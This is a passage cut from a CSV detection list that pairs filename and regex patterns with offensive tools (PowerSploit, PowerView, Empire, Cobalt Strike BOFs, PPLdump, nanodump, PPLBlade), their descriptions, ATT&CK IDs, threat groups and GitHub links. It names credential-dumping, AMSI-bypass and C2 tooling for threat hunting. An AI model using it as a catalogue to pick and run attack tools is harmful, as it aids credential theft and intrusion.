T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerShellObfuscator.ps1*",".{0,1000}PowerShellObfuscator\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "*PowershellRunner.h*",".{0,1000}PowershellRunner\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*PowerShellStager*",".{0,1000}PowerShellStager.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*PowerShell-Suite*",".{0,1000}PowerShell\-Suite.{0,1000}","offensive_tool_keyword","PowerShell-Suite","There are great tools and resources online to accomplish most any task in PowerShell. sometimes however. there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind.","T1059 - T1086 - T1140 - T1145 - T1216","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/PowerShell-Suite","1","1","N/A","N/A","10","2566","760","2021-11-19T12:18:24Z","2015-12-11T13:14:41Z" "*PowershellTools-main.zip*",".{0,1000}PowershellTools\-main\.zip.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*PowerShx.dll*",".{0,1000}PowerShx\.dll.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx.exe*",".{0,1000}PowerShx\.exe.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx.sln*",".{0,1000}PowerShx\.sln.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShxDll.csproj*",".{0,1000}PowerShxDll\.csproj.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerShx-master*",".{0,1000}PowerShx\-master.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","1","N/A","7","3","274","46","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z" "*PowerSploit*",".{0,1000}PowerSploit.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit-*.zip*",".{0,1000}PowerSploit\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit.*",".{0,1000}PowerSploit\..{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerSploit/releases*",".{0,1000}PowerSploit\/releases.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*powerstager*",".{0,1000}powerstager.{0,1000}","offensive_tool_keyword","PowerStager","PowerStager: This script creates an executable stager that downloads a selected powershell payload.","T1105 - T1059.001 - T1204","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/z0noxz/powerstager","1","1","N/A","N/A","2","182","59","2019-12-15T09:30:05Z","2017-04-17T12:13:31Z" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUp.ps1*",".{0,1000}PowerUp\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1128","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerUpSQL*",".{0,1000}PowerUpSQL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1087 - T1059 - T1003 - T1078 - T1053 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","Web Attacks","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","2330","455","2024-04-29T09:10:57Z","2016-06-22T01:22:39Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*powerview.ps1*",".{0,1000}powerview\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1078","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*PowerView.ps1*",".{0,1000}PowerView\.ps1.{0,1000}","offensive_tool_keyword","powerview","PowerView is a PowerShell tool to gain network situational awareness on Windows domains. It contains a set of pure-PowerShell replacements for various windows net commands. which utilize PowerShell AD hooks and underlying Win32 API functions to perform useful Windows domain functionality It also implements various useful metafunctions. including some custom-written user-hunting functions which will identify where on the network specific users are logged into. It can also check which machines on the domain the current user has local administrator access on. Several functions for the enumeration and abuse of domain trusts also exist","T1087 - T1069 - T1064 - T1002 - T1552","TA0002 - TA0003 - TA0008","N/A","N/A","Information Gathering","https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon","1","0","N/A","N/A","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*PowerView_dev.ps1*",".{0,1000}PowerView_dev\.ps1.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*PowerView3-Aggressor*",".{0,1000}PowerView3\-Aggressor.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","128","40","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*ppenum.c*",".{0,1000}ppenum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.exe*",".{0,1000}ppenum\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.x64.*",".{0,1000}ppenum\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*ppenum.x86.*",".{0,1000}ppenum\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Simple BOF to read the protection level of a process","T1012","TA0007","N/A","N/A","Reconnaissance","https://github.com/rasta-mouse/PPEnum","1","1","N/A","N/A","1","96","8","2023-05-10T16:41:09Z","2023-05-10T16:38:36Z" "*PPIDSpoof.ps1*",".{0,1000}PPIDSpoof\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*ppl* --elevate-handle *.dmp*",".{0,1000}ppl.{0,1000}\s\-\-elevate\-handle\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*ppl_dump.x64*",".{0,1000}ppl_dump\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ppl_medic_dll.*",".{0,1000}ppl_medic_dll\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*PPLBlade.dmp*",".{0,1000}PPLBlade\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*PPLBlade.exe*",".{0,1000}PPLBlade\.exe.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*PPLBlade-main.*",".{0,1000}PPLBlade\-main\..{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","1","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*ppldump *",".{0,1000}ppldump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","0","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*PPLdump*",".{0,1000}PPLdump.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdump.exe*",".{0,1000}PPLdump\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*ppldump.py*",".{0,1000}ppldump\.py.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*PPLDump_BOF.*",".{0,1000}PPLDump_BOF\..{0,1000}","offensive_tool_keyword","cobaltstrike","A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/PPLDump_BOF","1","1","N/A","10","10","136","25","2021-09-24T07:10:04Z","2021-09-24T07:05:59Z" "*ppldump_embedded*",".{0,1000}ppldump_embedded.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*PPLdump64.exe*",".{0,1000}PPLdump64\.exe.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLdumpDll*",".{0,1000}PPLdumpDll.{0,1000}","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","1","N/A","N/A","9","810","141","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*PPLFault.*",".{0,1000}PPLFault\..{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*pplfault.cna*",".{0,1000}pplfault\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original PPLFault and the original included DumpShellcode and combinds it all into a BOF targeting cobalt strike.","T1055 - T1078.003","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/trustedsec/PPLFaultDumpBOF","1","1","N/A","N/A","2","128","11","2023-05-17T12:57:20Z","2023-05-16T13:02:22Z" "*PPLFault.exe*",".{0,1000}PPLFault\.exe.{0,1000}","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","474","84","2024-02-22T17:23:53Z","2022-09-22T19:39:24Z" "*PPLFaultDumpBOF*",".{0,1000}PPLFaultDumpBOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Takes the original 